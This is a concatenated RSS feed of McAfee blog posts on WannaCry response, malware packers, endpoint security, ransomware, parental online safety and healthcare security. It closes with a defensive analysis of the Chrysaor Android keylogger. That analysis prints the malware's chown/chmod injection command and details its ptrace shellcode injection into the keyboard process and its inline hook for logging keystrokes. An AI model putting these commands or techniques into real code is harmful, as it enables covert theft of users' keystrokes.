Proactive analysis and hunting using analytics and intelligence allows SOC staff to be on constant vigil for activity related to known WannaCry behaviors, and trigger an action – from active quarantine to a policy-driven scan to an email or SMS alert to drive incident responders. Here’s what you can do in the McAfee ecosystem:

  1. Enable Analytics-driven monitoring of events and behaviors. IOCs ingested by the SIEM can populate a watchlist for ongoing, forward-looking monitoring for new occurrences. In addition, endpoint trace data sent by McAfee Active Response is being monitored in the cloud for behaviors that are indications of WannaCry activities (persistence, stealth, recon, self protection, data stolen, signal infection).
  2. Enhance Human investigations. The Active Response threat workspace presents endpoint event findings from the cloud in a dynamic dashboard that can help you drill down and explore event relationships. Similarly, SIEM shows new events in the context of the overall estate, including user context, network flow data, and more.
  3. Conduct Manual IOC searches. In the case of WannaCry, indicators of compromise (IOCs) are publicly available from several sources, including the US CERT. So in addition to the discoveries within your environment shared by your internal sandbox, you should also be consuming and evaluating these other third party intelligence sources to get the most complete picture of known WannaCry behaviors. When new intelligence emerges from third party or local sources, these can trigger ad hoc searching using McAfee Active Response.

3. Final Question – Am I maintaining protection?

Many tools today can be updated with new IOCs and signature and policy-driven updates and actions. This video of OpenDXL and a threat intelligence platform show one way that this process can be managed. McAfee ePolicy Orchestrator integrations can take action on a variety of endpoint systems, including Security Innovation Alliance integrated partners.

Rapidly spreading malware like WannaCry should be a further spur to SOC teams to improve their access to and use of the intelligence so readily available today. The good news for SOC staff is that many functions that should be performed can be automated, freeing you to do the investigation and extrapolation that only humans can drive. For ideas, please check out these blogs on automation and threat hunting.

The post What WannaCry Means for the SOC appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/optimize-operations/what_wannacry_means_soc/feed/ 0
Malware Packers Use Tricks to Avoid Analysis, Detection https://securingtomorrow.mcafee.com/technical-how-to/malware-packers-use-tricks-avoid-analysis-detection/ https://securingtomorrow.mcafee.com/technical-how-to/malware-packers-use-tricks-avoid-analysis-detection/#respond Wed, 17 May 2017 05:29:18 +0000 https://securingtomorrow.mcafee.com/?p=74166 Malware authors use a number of tricks to avoid detection and analysis. One of the most popular methods is to employ a packer, a tool that compresses, encrypts, and/or modifies a malicious file’s format. (Packers can also be used for legitimate ends, for example, to protect a program against cracking or copying.) All these tricks …

The post Malware Packers Use Tricks to Avoid Analysis, Detection appeared first on McAfee Blogs.

]]>
Malware authors use a number of tricks to avoid detection and analysis. One of the most popular methods is to employ a packer, a tool that compresses, encrypts, and/or modifies a malicious file’s format. (Packers can also be used for legitimate ends, for example, to protect a program against cracking or copying.) All these tricks decrease the chance of detection by antimalware products and help to avoid analysis by security researchers.

Packers can both make it harder for security staff to identify the behavior of malware and increase the amount of time required for an analysis. Unpacking malware is the first challenge to understanding a threat. The complexity of packers varies.

 

Types of packers

A packer can act simply as armor to protect the binary. It is more convenient for attackers to use a packer rather than to directly implement protection inside the code. Advanced malware coded by organized cybercriminal groups, however, employ custom packers or implement complex protection inside malicious files.

For packers that encrypt or compress a file, a stub (a piece of code that contains the decompression or decryption routine) acts as a loader, which executes before the malware.

A packer compresses or encrypts data. The original file is passed in the packer routine and stored in a packed section in the new .exe. Once the file is running, the decompression stub stored in the packed file will decompress the packed section. The original .exe file is then loaded into memory.

In these cases the original entry point, the memory address where the program starts, is relocated in the packed section. The analyst has to retrieve it to recover the original file.

Other packers act as a proxy and protect the import address table (IAT). The IAT references functions that are used by a program and are available by the Windows API. During runtime the IAT is resolved dynamically and used by the program when necessary. This protection increases the difficulty of unpacking the malware. Indeed, a memory dump does not work because the IAT is not complete. Without the IAT, it is more difficult to correctly analyze malware because it cannot be properly disassembled.

A packer obfuscating an API. The packer stub acts as a proxy and intercepts every call to the API. The call is translated from the API to the stub and is run by the payload.

In such cases, a malware analyst must fix the import by locating the function and tracing the return routine. A stub redirects the execution to the original API. In some cases, the address of the API is located in the EIP register.

Still other techniques virtualize the code and emulate the behavior of a processor to run the original file. This technique adds an abstraction layer between the executed code and its behavior. The original code is translated in the byte code of the virtual machine. This technique is one of the most difficult to analyze.

A code virtualization packer. The original file shows x86 assembly when reversed. Once the file is protected, the reversed code will be in the virtual machine’s byte code.

To remove this kind of protection, a malware analyst must study the behavior and the byte code of the virtual software to retrieve and analyze the original file.

Other packers will combine techniques such as anti-debugging or anti-sandbox and add more functions to protect the malware. Some malware use several layers to protect themselves against detection and analysis. To analyze them we must remove each layer until we recover the original file. The fastest recovery technique is to run the malware and dump it directly from memory. This can be difficult because some packers add antidumping tricks.

Packers remain an effective way to slow down analysis and decrease detection by antimalware products. They are also the favorite tool of attackers for protecting malware. Nevertheless, manual analysis usually defeats packers.

The post Malware Packers Use Tricks to Avoid Analysis, Detection appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/technical-how-to/malware-packers-use-tricks-avoid-analysis-detection/feed/ 0
Six Steps to Mastering Modern Endpoint Security https://securingtomorrow.mcafee.com/business/dynamic-endpoint/six-steps-mastering-modern-endpoint-security/ https://securingtomorrow.mcafee.com/business/dynamic-endpoint/six-steps-mastering-modern-endpoint-security/#respond Tue, 16 May 2017 21:00:15 +0000 https://securingtomorrow.mcafee.com/?p=74150 Organizations have added layer after layer of defense to stay ahead of the latest cyberattacks. In theory, they should be better protected. Instead, security teams are drowning in tools and interfaces. According to the 2017 Forrester report Mastering the Endpoint, organizations now monitor 10 different security agents on average and swivel between at least five …

The post Six Steps to Mastering Modern Endpoint Security appeared first on McAfee Blogs.

]]>
Organizations have added layer after layer of defense to stay ahead of the latest cyberattacks. In theory, they should be better protected. Instead, security teams are drowning in tools and interfaces. According to the 2017 Forrester report Mastering the Endpoint, organizations now monitor 10 different security agents on average and swivel between at least five different interfaces to investigate and remediate incidents.

There’s a way to get ahead with fresh thinking about endpoint security. Drawing on real-world experiences from more than 250 security decision makers along with insights from Forrester and McAfee, here are six essential steps for mastering the modern endpoint, and protecting the enterprise both today, and tomorrow.

  1. Build a security framework that scales and adapts to the changing threat landscape.

The concept of adding multiple layers of defense is widely accepted, but the key to gaining the most value out of these layers is connecting them using a flexible, adaptive security framework. By implementing defense layers that communicate with one another, you achieve greater efficiency and efficacy. The ideal framework is extensible, allowing you to continually add new layers to the fabric as business and security requirements change.

  1. Integrate detection and response capabilities into everyday operations.

Administrators need the ability to quickly follow the tracks of a threat and clean up everything it touches. Unfortunately, those capabilities are typically limited to specialized investigators, and there just aren’t enough of them to go around. Adding yet another disparate investigation suite won’t solve this problem. By implementing a solution that integrates detection and response capabilities into everyday endpoint operations, front-line administrators can respond quickly when infections inevitably hit.

  1. Minimize false positives so you can focus more on critical tasks.

Defenses that share threat intelligence can automatically validate or exonerate a potential threat, so human administrators don’t have to. By eliminating layers of complexity and manual effort, front-line security teams are empowered to cut through the noise and respond faster. Create even more focus by automatically surfacing the highest-priority incidents and provide a clear workflow for resolution.

  1. Share threat intelligence in real time and immediately apply the learnings.

The ideal threat intelligence strategy combines external sources with intelligence gathered from your own environment. Platforms should share intelligence across multiple layers of defenses in real time—automatically, without requiring administrators to swivel between interfaces. The platform should then immediately apply information gleaned from one infection to every other security system in your environment.

  1. Use advanced machine learning and the cloud for scale and speed.

Implementing and utilizing advanced machine learning capabilities, both locally and in the cloud, allows you to statistically compare suspicious executables against thousands of attributes of known threats—without signatures. The ability to analyze both static code features and an executable’s actual behavior allows you to uncover hidden threats in seconds.

  1. Consolidate agents and manual processes.

By consolidating multiple tools, systems, and reports into a single management console, manual processes are drastically decreased. By adopting a consolidated approach, you can reduce the number of agents your team administers and automate manual tasks with streamlined workflows. Instead of spending hours battling disparate interfaces, you empower your team to control multiple layers of endpoint security with automated, “set-it-and-forget-it” capabilities.

For more details on how other organizations are responding to their own endpoint security gaps, and Forrester’s recommendations to address them, watch the recording of our recent webcast: Mastering Endpoint Security with Guest Forrester Research.

The post Six Steps to Mastering Modern Endpoint Security appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/dynamic-endpoint/six-steps-mastering-modern-endpoint-security/feed/ 0
Your data has been kidnapped… now what? https://securingtomorrow.mcafee.com/business/neutralize-threats/your-data-has-been-kidnapped-now-what/ Tue, 16 May 2017 17:34:29 +0000 https://securingtomorrow.mcafee.com/?p=74139 What’s it like to be held hostage? I never want to find out and I’ll bet you don’t either. But given today’s environment executives might find themselves held hostage in a way they never expected. Ransomware, as it is known because it holds your entire computer system hostage, is quickly becoming the hacker’s method of choice …

The post Your data has been kidnapped… now what? appeared first on McAfee Blogs.

]]>
What’s it like to be held hostage? I never want to find out and I’ll bet you don’t either. But given today’s environment executives might find themselves held hostage in a way they never expected. Ransomware, as it is known because it holds your entire computer system hostage, is quickly becoming the hacker’s method of choice because it’s simple, fast and virtually untraceable.

For the most part companies that are victims have little choice (unless they’re properly prepared – more on that later) than to pay the ransom, whatever it is, to alleviate the attack. In fact, up until very recently even the FBI has recommended to victims that they pay up.

Ransomware attacks are different than what most people perceive as a cyberattack. There’s no theft of data or interest in stealing personal identification. Hackers don’t care if your company stores credit card information, medical records, login credentials or Social Security numbers. Instead, ransomware attacks leverage the importance of your business operation and access to your data, or what your computers control, to force you to pay up. And it happens. A lot.

In fact, it’s becoming so ubiquitous that the CyberThreat Alliance estimates that they’ve seen 406,887 instances of just one type of “infection” and that the damage last year alone was $325 million. And that’s a soft number because it doesn’t calculate the damage from lost time, productivity and reputation. $325 million is just what you can put your finger on.

So how does this work and why is it so effective? Simple: An email containing a link, attachment or embedded virus is sent to someone – anyone – in your organization. It might appear to come from the CEO, or from a large bank or credit card company. Using standard “phishing” techniques they’re bound to get at least one sucker to open the attachment and that’s all it takes. Once they open the email and click the link your entire organization could be held hostage for a ransom. What happens is that by clicking the link or downloading the file they’ve installed a piece of nefarious code that hackers will then use to encrypt your entire system with a key that only they have. But maybe not right away.

Imagine that your entire company and everything in it that is connected to the Internet – payment processing, manufacturing machinery, logistics control, physical security systems – essentially everything – grinds to a very loud screeching halt. Because the hackers were patient, they planted the seed for this weeks ago when an email contained a link to a file labeled “Account receipt.doc” or “Financial records.pdf” or some other tempting name. Nothing happened at the time (because the hackers planned it that way) and the code just waited. And waited. And waited some more until you receive a frightening and threatening email telling you that you need to pay up or you’ll lose access to every record your company maintains.

Worse, you’ll be completely locked out of every control, machine, logistics management software, sensor, camera, temperature regulator, voltage regulator and whatever else is on your network.

And your personnel records, inventory information, customer data and everything else that’s stored anywhere on your network? As the old-style thieves used to say, fuhgeddaboudit. You’re toast. And as the clock keeps ticking and the business losses pile up the board of directors and the executives are left with a simple choice: Pay the ransom to get the key to unlock your world or take the high road and refuse to pay but watch your business crumble.

There’s no right choice … but there’s no good choice, either. Ethics and principle demand that you stand your ground and not negotiate with criminals. Reality, however, is that your phone system doesn’t work, your factory is completely shut down, your ledgers, ordering system and everything else is eerily quiet. So you grind your teeth, bang your fist on the desk … and pay.

Or not. Maybe you don’t have to pay because you took the appropriate precautions. They’re relatively simple but the number of companies that don’t follow these simple guidelines would shock you.

  • Backup backup backup backup backup. That’s right – do it daily, weekly, monthly, quarterly and annually. Move the backups offline to another, totally separate network with completely different credentials and operations. That’s what cloud systems are great for – use them. Take snapshots of different types of data in different ways. Be absolutely totally obsessively compulsively fanatic about it. And then do it some more. If you have an unencrypted backup and are the victim of a ransomware attack you can laugh at the criminals while you restore a perfectly preserved snapshot of your system from the day, week or month before. It may not be up to the minute but it’ll be enough and you’ll thank yourself for doing it.
  • Educate your employees until they’re sick of hearing it. Tell them not to click links, insert USB thumb drives, open emails from anyone not in their address book and a dozen other things that can expose the entire company. Then do it again. And again – until it is seared into their memory to the point where they are all mildly paranoid. In today’s cybercrime world that’s a healthy state of mind.
  • Conduct a fire drill. Pick a day – preferably over a weekend or sometime when your normal business will not be heavily impacted and tell your IT department that you just got the worst scareware letter you’ve ever seen or have the IT department call you and tell you that every single aspect of your system is locked up. And then create a checklist of what to do, who is responsible for doing it and what can be done while you are bringing your backup online. Do you need to call customers, put up a message on your web page, make a public announcement or tell your employees? Figure it out now because when this happens you won’t be able to think about anything other than getting your operation restored.

Ransomware is nothing more than an old-fashioned kidnapping. But there isn’t just one person being held hostage, there’s an entire organization, your customers, your employees and, probably most dangerous of all … your reputation. Remember this: It takes years to build up a great reputation and just a moment to destroy it. Don’t let this happen to you. Don’t be a victim. Be diligent. Be prepared. Be cyber aware!

 

This article was written by Scott Goldman from CSO Magazine and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Your data has been kidnapped… now what? appeared first on McAfee Blogs.

]]>
Feeling Overwhelmed, Parents? Here’s Your Online Safety Cheat Sheet https://securingtomorrow.mcafee.com/consumer/family-safety/feeling-overwhelmed-parents-heres-your-online-safety-cheat-sheet/ https://securingtomorrow.mcafee.com/consumer/family-safety/feeling-overwhelmed-parents-heres-your-online-safety-cheat-sheet/#respond Tue, 16 May 2017 14:00:12 +0000 https://securingtomorrow.mcafee.com/?p=73856 Can we just get an extra five hours tacked onto each day so we can stay on top of our kid’s online activity? That’s the rhetorical question most parents carry around unspoken. With all the to-dos of parenting, isn’t there a shortcut on all that social media stuff we don’t have to bookmark or save …

The post Feeling Overwhelmed, Parents? Here’s Your Online Safety Cheat Sheet appeared first on McAfee Blogs.

]]>
Can we just get an extra five hours tacked onto each day so we can stay on top of our kid’s online activity? That’s the rhetorical question most parents carry around unspoken. With all the to-dos of parenting, isn’t there a shortcut on all that social media stuff we don’t have to bookmark or save to read later (but never do)?

We hear you and, more than that, we feel you. The struggle between knowing and doing is very, very real if you are a parent in the digital arena.

We’ve learned that despite knowing the risks online, kids still engage in risky behavior and routinely hide it from their parents. We also know from a McAfee study conducted in 2015, that 46% of youth engaging in risky behavior online say they would change their behavior if they knew their parents were paying attention — a fact that slathers on even more parental remorse if it feels like you’ve fallen behind.Online Safety Cheat Sheet

Becoming more involved in your child’s digital life doesn’t have to overwhelm or scare you off. So, while it’s not perfect, here’s a cheat sheet that will at least help you gain a sense of control over the place your kids spend most of their time. Most of all, this is all doable for busy parents.

10-point family safety cheat sheet

  1. Fire Up the Ground Rules. Success begins with a plan, and online safety is no different. So we start with establishing a plan or family ground rules. Caution: Do not skip this step. Why? Because life moves at warp speed and a child’s perception of reality and ‘what was said’ isn’t always going to match yours. Establish your ground rules, which includes in-home media, and set both expectations and consequences. Not sure where to begin? Here’s a primer on ground rules. Make the revisions to fit your family and post the final standards in a place where everyone can reference.
  2. Relationship Over Rules. Sometimes we simply do not realize that somewhere in the busyness of life we began to parent out of fear rather than a sense of faith in our kids and ourselves. This is where relationship becomes the #1 Internet safety tool a parent can possess. Connect with your children. Talk casually and frequently with your kids about what’s happening in their life, what’s up with school, friends, problems, and anything else important to them. Along the way, you’ll find out plenty about their online life and have the necessary permission (and trust) to work your concerns about online safety into any conversation.
  3. Restrict App Purchases. Skip this step, and Online Safety Cheat Sheetyou may discover a leak in your family finances to the tune of thousands of dollars. When so much of today’s purchases are “buy-with-one-click” take the few steps needed to put purchasing restrictions in place. Set consequences.Coach your child along the way. It’s easy to yell “sure, go ahead,” from another room when asked about a download. The wiser thing is to sit with your child and go through individual transactions. To prevent unauthorized app purchases, go into the Settings on all your mobile devices and PCs and set up in-app purchase restrictions. Every purchase attempt should require password confirmation. If your child has his or her phone, just be sure not to share your password or credit card information.
  4. Monitor Digital Devices. This step depends on your family ground rules, the age of your child, and the expectations you’ve set as a parent. Issues of privacy come up often in parenting circles and rightly so. However, monitoring comes down to being able to answer this question honestly: Has my child proven that he or she is responsible? If you decide to monitor, oversee the following: Inappropriate apps, vault apps, text messages, direct messages within Twitter, Facebook, Instagram, and Snapchat. Yes, you will need passwords to check all of these so be sure to put password sharing a requirement in your family contract. Starting early with the practice of random monitoring will become the standard as your kids get older. If you begin when they are teens, you may be in for a dogfight (so hang on tight).
  5. Ask Great Questions. Building trust with kids starts with asking great questions. Instead of deleting apps and getting angry about your child’s decisions, ask your child “what do you like about this app and why?” Instead of drilling your child on what he or she has seen online, ask “What would you do if you saw something inappropriate, dangerous, or frightening online?” Instead of restricting social media altogether if a digital conflict arises, ask “Tell me what you’d do if someone started bullying you online” or “How would you respond if you saw someone else being taunted or threatened online?”
  6. Secure Mobile and Home Devices. Research security standards before purchasing new devices. Compare devices paying particular attention to safety standards. Read customer reviews and Google security issues. On your child’s set Location Settings to private. Do this for personal safety reasons as well as Online Safety Cheat Sheetprivacy reasons. Some apps have the ability to access GPS information and transfer personal data to third parties. Set up a family location tracker such as Find My Friends so that you know where your child is at all times. To deter theft, set up a device tracker such as Find My iPhone. Depending on age, trust level, and online activity, require kids to share personal passwords with you and how to safely change passwords every few months.
  7. Secure Your Home Network. Limit your circle of trust when it comes to your home network — doing so protects your whole family physically and financially. Be sure to name your home network something other than your family name and don’t be casual when it comes to giving out your password. Treat your network password the way you would a house key. Think about creating a guest network so visitors can connect without gaining access to your family’s other networked devices or shared files.
  8. Know Those Apps! One of the biggest threats to a child’s online safety is his or her choice in apps. Apps run the gamut of risk and range from educational and uplifting to inappropriate and dangerous. Go on your child’s phone regularly and check for risky apps. Google the app and read app reviews. Look at age restrictions and customer reviews so you will be better equipped to evaluate whether an app may be suitable for your child. App risks include cyberbullying, predators, sexting, hacking, and illegal behaviors. Dangerous apps include Kik Messenger, Yik Yak, Whisper, Ask.Fm, Tumblr, and any other social network that allows anonymous users.
  9. Safe Search and Filtering Software. Most every popular search engine will have a Safe Search feature on the platform’s home page. You can quickly turn on Safe Search features on popular sites like Google, YouTube, and Netflix. This is an excellent way to weed out the inappropriate images, content, movies, and videos. Safe search is a start but only skips a rock across the problem. To seriously guard your child against the potential of inappropriate content, research internet filtering software for both PCs and smartphones.
  10. Befriend Your Kids’ Friends. You won’t find this in many how-to safety blogs, however, outside of your relationship with your child, the biggest influence will be his or her friends. Those friends will significantly influence the decisions your makes online and off. For that reason, it’s critical to stay connected with your child’s friends. Know who they are, know their parents, and how they behave online. You don’t have to “follow” or “friend” other kids to gain a clear understanding of the influence they may have on your child.

ToniTwitterHS

 

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @IntelSec_Family. (Disclosures).

The post Feeling Overwhelmed, Parents? Here’s Your Online Safety Cheat Sheet appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/feeling-overwhelmed-parents-heres-your-online-safety-cheat-sheet/feed/ 0
Healthcare security will only become more complicated https://securingtomorrow.mcafee.com/business/safeguard-data/healthcare-security-will-only-become-more-complicated/ Mon, 15 May 2017 23:00:19 +0000 https://securingtomorrow.mcafee.com/?p=74111 The ability to protect and secure digital information is under constant threat. Attackers of all sorts force their way into systems, trick individuals into providing access and otherwise access data that is not their own. In a state of continual threats, the issue of cybersecurity is typically at the forefront for many. Questions about cyber …

The post Healthcare security will only become more complicated appeared first on McAfee Blogs.

]]>
The ability to protect and secure digital information is under constant threat. Attackers of all sorts force their way into systems, trick individuals into providing access and otherwise access data that is not their own.

In a state of continual threats, the issue of cybersecurity is typically at the forefront for many. Questions about cyber security include the following – can data actually be secure? Will defense measures ever be better than the offensive measure? And is it necessary to accept that all data will be hacked or inappropriately accessed at some point in time?

Given the uncertainty and focus, an analysis from the Center for Long-Term Cybersecurity at the University of California, Berkeley is particularly interesting. The analysis, Cybersecurity Futures 2020, contemplates five different scenarios for what cyber security and data will look like in the near future. Each scenario offers a glimpse into a possible future. The scenarios are all quite plausible and to some degree even represent current realities.

The scenarios, in brief summary, are:

The New Normal. In this scenario, it is accepted that data cannot be kept private and that personal information will be both stolen and broadcast. In response, individuals or institutions may respond by shutting off connections to the internet, proactively making information public before it can be inappropriately accessed or fight back with any tool that may become available.

Omega. This scenario is named after the “omega,” or last algorithm concept. The omega algorithm would be the last step before control is turned over to technology. With the omega algorithm in place, individualized predictive analytics would create new strata of security risks. Additionally, issues would become focused on individuals as opposed to infrastructure, which in turn could cause irreparable damage in a number of ways.

Bubble 2.0. In this scenario, a second bubble bursts when it comes to web-based companies. Decades after the dot-com bubble of the 1990s, the new web companies suffer a similar fate. However, the primary asset of each of these companies is a tremendous trove of personal data. The data do not disappear with the companies. Instead, the data will be sold. With data sets the main target of cybercriminals and increasing numbers of data scientists unemployed, cybersecurity and market security become entangled.

Intentional Internet of Things. In this scenario, the Internet of Things becomes seamlessly integrated into everyday life. In fact, certain core functions are turned over to technology. Such functions could include healthcare to a degree, environmental functions and other social of economic functions. As such, attackers may subtly infiltrate systems to manipulate the vast array of connected devices or have the opportunity to cause widespread harm. Cybersecurity becomes just security and must be a part of everyday life.

Sensorium (Internet of Emotion). In this scenario, devices move beyond physical functions and into an individual’s emotional state. Devices will track fundamental emotional aspects of an individual’s psychology. In turn, an individual’s mental or emotional state can be manipulated for any number of purposes. Cybersecurity evolves from data protection to managing and protecting an emotional public image.

The goal of the scenarios is not to identify what is occurring today, but developing concepts of how the future may actually unfold. After the potential futures are detailed, then it is possible to study those futures and engage in strategic planning or set forth research priorities.

Starting from such a framework, it is easy to see why each scenario reflects some current realities. In fact, the currently existing world is likely a reflection of some components from each of the scenarios.

With these possible futures laid out, what does it mean for cybersecurity today? It means that cybersecurity should be considered as more than just a quick challenge or one that will remain the same. Changes in what cybersecurity means can already be seen on a daily basis. Threats are constantly evolving, changing or springing up completely new. What is known a week or month before has become obsolete to some degree.

A few overarching issues can also be teased out from the current state of cybersecurity and where the future may go. The human element will be both a primary concern and benefit. Individuals are currently the cause of many data breaches. Those causes include falling victim to a phishing attack, purposefully accessing data for malicious purposes or an unintentional action that exposes information, among other issues.

At the same time, individuals are actively trying to increase security measures and make it more difficult for a data security incident to occur. The opposing forces of human intervention will also be at the center of cybersecurity because so much of what happens in this world is about what humans are doing.

Another overarching issue is the role of data in the economy and as a resource. Much of the world economy centers around creation, curation and analysis of data. Product development and sales center on data because data help identify what product should be developed, how it should go to market and where it should be sold. From this perspective, data have become a commodity because it informs so many potential decisions. It may not be possible to fully separate the different functions of data as being a driver of and a good in the economy are so intertwined.

The central importance of data to the economy means that it will be a constant target. If individuals and companies cannot secure data, then someone else will exploit the data. Accordingly, there is a fundamental monetary consideration driving the need to ensure security is in place and actually works.

The central role of data in so many aspects of life and the inability to ensure constantly appropriate individual behavior means that there will never be a single solution for ensuring cybersecurity. Risks will always exist because, as the old saying goes, a system is only as strong as its weakest link. Since the weakest link is ever changing, all links can never be fully strengthened. If such a reality can be accepted, it means that vigilance will be maintained.

A corollary to the lack of a cybersecurity silver bullet is that the attackers will also always be multiple steps ahead. Such is the nature of attack because those trying to gain access to a system are incentivized to come up with novel approaches. While security and defense can also identify a novel concept, it is just more likely for the other side to have already thought of and blown past an idea.

What impact do all of the predictions and pondering have for healthcare? What is true generally for cyber security will likely be equally if not more important for healthcare. The quantity of healthcare data are growing at exponential rates, and such data is among the most private and sensitive that can relate to an individual.

Additionally, healthcare is already not only under almost constant threat but is likely to fall victim to a successful attack. Any number of negative consequences can be imagined if the situation does not improve. Such negative outcomes could include individuals not trusting the system and withholding information, increasing amounts of fraud funneling money out of the system to illegitimate hands, or manipulation of data to influence or create outcomes. These concerns echo those of the scenarios because all are likely. Given the possibilities, healthcare is very much at a crossroads when it comes to security.

The future does not need to look grim. Alongside all of the potential nightmares are an equal, if not greater, number of improved benefits and outcomes. The issue is whether all will take up the challenge and work collaboratively for the good of everyone.

 

This article was written by Matthew Fisher from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Healthcare security will only become more complicated appeared first on McAfee Blogs.

]]>
Analysis of Chrysaor Keylogging Mechanism Shows Power of Simple Malicious Code https://securingtomorrow.mcafee.com/mcafee-labs/analysis-chrysaor-keylogging-mechanism-shows-power-simple-malicious-code/ https://securingtomorrow.mcafee.com/mcafee-labs/analysis-chrysaor-keylogging-mechanism-shows-power-simple-malicious-code/#comments Mon, 15 May 2017 22:31:31 +0000 https://securingtomorrow.mcafee.com/?p=74083 Many attacks on mobile devices use social engineering to initially infect a victim’s system. They download malware and elevate privileges by exploiting vulnerabilities. Mobile malware often uses persistence mechanisms to hide and monitor the victim’s behavior. Unlike personal computers, mobile devices are used more often by their owners, and carry sensitive information such as phone …

The post Analysis of Chrysaor Keylogging Mechanism Shows Power of Simple Malicious Code appeared first on McAfee Blogs.

]]>
Many attacks on mobile devices use social engineering to initially infect a victim’s system. They download malware and elevate privileges by exploiting vulnerabilities. Mobile malware often uses persistence mechanisms to hide and monitor the victim’s behavior. Unlike personal computers, mobile devices are used more often by their owners, and carry sensitive information such as phone numbers, personal images, SMS messages, and other data that can be used to socially engineer more victims. Furthermore, mobile devices have cameras, microphones, and GPS that can be used to spy on the targets. Infected mobile devices expose users to greater risks than infected computers.

Recently Google and Lookout published information about the Android version of surveillance malware Pegasus (also known as Chrysaor, the brother of Pegasus in Greek myth). Pegasus infections were a big story last year. This year’s attacks are called Chrysaor (by Google) or Pegasus (by Lookout). When Chrysaor is installed, it leaks data of popular apps and remotely controls the device. The Lookout report covers all the features of the Chrysaor malware, but only briefly explains how the malware injects code and installs a hook for keylogging. We decided to analyze the Chrysaor sample in more detail to understand how its keylogging works. We analyzed the sample with the SHA-256 hash ade8bef0ac29fa363fc9afd958af0074478aef650adeb0318517b48bd996d5d5.

Overview

The basic keylogging process.

The sample has two main binaries related to keylogging: addk.so and libk.so. When the sample executes, the former is copied to /data/local/tmp/inulmn and the latter to /data/local/tmp/libuml.so. The addk.so file injects shellcode into the memory space of the keyboard process (Step 1 in the preceding graphic). When the shellcode runs, it loads libk.so and calls the function init() (Step 2). This function installs a hook to capture user keystrokes to a file (Step 3).

To log keystrokes, a superuser binary, which manages access to root privileges, must be positioned at /system/csk or the keylogging code will not execute.

Checking for the superuser binary.

The following code shows part of a system command string for injecting /data/local/tmp/libuml.so to the keyboard process using the binary /data/local/tmp/inulmn.

Code for constructing the command string.

The fully constructed string:

chown 0.0 /data/local/tmp/inulmn ;

chown 0.0 /data/local/tmp/libuml.so ;

chmod 0777 /data/local/tmp/inulmn ;

chmod 0777 /data/local/tmp/libuml.so ;

/data/local/tmp/inulmn <pid of keyboard process> /data/local/tmp/libuml.so init;

We can see that /data/local/tmp/inulmn executes, passing the process ID of the target process (the keyboard), the name of the binary to inject (/data/local/tmp/libuml.so), and the function to execute (init) as command-line parameters.

Finding the current input method process

To log user keystrokes, Chrysaor first queries the value of DEFAULT_INPUT_METHOD in secure system settings. This records the input method used by default and gets the method’s ID.

Gathering the ID of the system’s default input method (keyboard).

The malware then searches for the input method (keyboard) process in the list of running processes using the ID. When found, the malware extracts the ID of the process so that it can inject the code.

Code searching for ID of the keyboard process.

Injecting code

Once Chrysaor has found the ID of the keyboard process, it tries to inject its code and hook the function to log keystrokes. The native library addk.so allows the injecting of code into the keyboard process and executing certain functions using the ptrace API. Addk.so gains the target process’ PID, the path of the .so file to inject, and the function to execute as parameters. With this information, the malware finds the function addresses of APIs such as dlsym(), dlopen(), and mmap() in the target process’ memory space using the proc filesystem.

Dynamically finding the addresses of APIs.

Using the /proc file system to search the memory space of the keyboard process.

The function address information is saved in the data segment adjacent to the shellcode, which executes the functions injected into the target process. The following image shows the shellcode that is copied to the target process’ memory space. The memory addresses in red boxes are resolved at runtime.

Shellcode for executing the injected functions.

Memory layout of shellcode and data.

The shellcode and related data such as API addresses, strings passed as function parameters, saved registers, and so on are all close together so they can be copied with one operation.

After addk.so attaches to the keyboard process and copies the shellcode and related API addresses to the mmaped area using PTRACE_POKETEXT, the shellcode is executed by setting a return frame to the shellcode address with PTRACE_SETREGS. The shellcode calls dlopen(), using the copied remote address, to load the binary and call the injected function. Libk.so calls the init() function, which installs a hook for keylogging. Addk.so passes the string “test” as a parameter of the injected function.

Logging keystrokes

The init() function installs an inline hook at the beginning of the IPCThreadState transact() function and logs the keystrokes.

Hooking the function IPCThreadState transact().

The following diagram shows the execution flow when the inline hook is installed on the transact() function:

Execution flow after hooking.

The Init() function overwrites the first 8 bytes of transact() with an 8-byte hook code that jumps to the keylogger. The original 8 bytes are copied to a separate memory space that has stub code for jumping back to the transact() function.

When the transact() function is called (Step 1), the installed keylogger executes first due to the hook code. The keylogger checks the function code to see whether it is 0x6 (setComposingText) or 0x8 (commitText). If true, the function calls android::Parcel::enforceInterface(“com.android.internal.view.IInputContext”) and reads the keystroke data from the parcel and logs it to a file. After the keylogging is complete (Step 2), the function executes the 8 bytes of instructions that were copied from the start of the transact() function. Finally the stub code runs (Step 3), which jumps back to transact() at offset +8.

Code to check the function code for keylogging.

The data passed to the transact() function when the function code is 0x6 or 0x8 is the character sequence of the user’s input. This value is encoded and written to /data/local/tmp/ktmu/ulmndd.tmp. After some time passes, this file is renamed to /data/local/tmp/ktmu/finidk.<timestamp>.

Logging keystrokes to a file.

Conclusion

We have looked at how simple code can log user keystrokes in mobile devices. If the infected mobile device is an executive’s company phone, the situation is worse. An executive’s phone may contain corporate or business secrets, plus contacts of other executives, which can have a huge negative business impact if leaked. The mobility of phones requires they be treated differently than desktop computers from an incident-response perspective: It is more difficult to trace data leaks because of the characteristics of mobile devices. Thus organizations must create incident-response and other security policies for mobile devices. If corporations cannot secure their mobile devices, they are exposing a huge attack surface to cybercriminals.

Never install Android applications from unknown sources and always keep your device’s operating system up to date to help protect against attacks. These simple steps will significantly lower the chances of infection. If your device quickly loses battery power or generates an abnormal amount of network traffic, it may have been compromised—requiring a factory reset or a security solution to delete malware.

The post Analysis of Chrysaor Keylogging Mechanism Shows Power of Simple Malicious Code appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/mcafee-labs/analysis-chrysaor-keylogging-mechanism-shows-power-simple-malicious-code/feed/ 1
